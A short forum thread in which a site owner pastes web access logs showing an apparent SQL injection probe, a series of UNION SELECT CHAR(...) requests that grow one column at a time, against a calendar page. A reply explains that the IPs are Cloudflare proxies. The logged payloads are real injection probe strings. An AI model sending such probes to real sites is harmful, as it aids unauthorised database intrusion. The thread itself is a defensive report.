Cloudflare hacking?

It seems like Cloudflare is repeatedly calling a webpage on our site (btcnj.com) with “nonsense” data. The data is SQL commands and they keep getting bigger. It looks like an injection attack.

What is going on?

This is what the access logs look like for this:

162.158.88.50 - - [21/Mar/2020:10:14:15 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45)%20–%20 HTTP/1.0” 200 4733 “-” “-”
162.158.94.80 - - [21/Mar/2020:10:14:15 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)%20–%20 HTTP/1.0” 200 4740 “-” “-”
162.158.90.254 - - [21/Mar/2020:10:14:15 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45)%20–%20 HTTP/1.0” 200 4743 “-” “-”
162.158.91.65 - - [21/Mar/2020:10:14:16 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45)%20–%20 HTTP/1.0” 200 4747 “-” “-”
162.158.88.188 - - [21/Mar/2020:10:14:16 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45)%20–%20 HTTP/1.0” 200 4750 “-” “-”
162.158.94.124 - - [21/Mar/2020:10:14:16 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45)%20–%20 HTTP/1.0” 200 4753 “-” “-”
162.158.91.41 - - [21/Mar/2020:10:14:17 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45)%20–%20 HTTP/1.0” 200 4756 “-” “-”
162.158.90.254 - - [21/Mar/2020:10:14:17 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45)%20–%20 HTTP/1.0” 200 4759 “-” “-”
162.158.91.213 - - [21/Mar/2020:10:14:18 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45)%20–%20 HTTP/1.0” 200 4763 “-” “-”
162.158.91.213 - - [21/Mar/2020:10:14:18 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45)%20–%20 HTTP/1.0” 200 4768 “-” “-”
162.158.90.156 - - [21/Mar/2020:10:14:18 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45)%20–%20 HTTP/1.0” 200 4770 “-” “-”
162.158.94.124 - - [21/Mar/2020:10:14:19 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45)%20–%20 HTTP/1.0” 200 4774 “-” “-”
162.158.88.50 - - [21/Mar/2020:10:14:19 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45)%20–%20 HTTP/1.0” 200 4778 “-” “-”
162.158.89.133 - - [21/Mar/2020:10:14:20 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45)%20–%20 HTTP/1.0” 200 4783 “-” “-”
162.158.94.80 - - [21/Mar/2020:10:14:21 -0400] “GET /pages/calendarShowDetail.php?calid=4901111111111111%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45),CHAR(45,120,51,45,81,45),CHAR(45,120,52,45,81,45),CHAR(45,120,53,45,81,45),CHAR(45,120,54,45,81,45),CHAR(45,120,55,45,81,45),CHAR(45,120,56,45,81,45),CHAR(45,120,57,45,81,45),CHAR(45,120,49,48,45,81,45),CHAR(45,120,49,49,45,81,45),CHAR(45,120,49,50,45,81,45),CHAR(45,120,49,51,45,81,45),CHAR(45,120,49,52,45,81,45),CHAR(45,120,49,53,45,81,45)%20–%20 HTTP/1.0” 200 4787 “-” “-”

You are not rewriting IP addresses -> https://support.cloudflare.com/hc/en-us/sections/200805497-Restoring-Visitor-IPs

2 Likes

Thanks.

Some of the IP addresses in the log are already not cloudflare’s.

I’m not sure if my hosting company is going to let me install that package.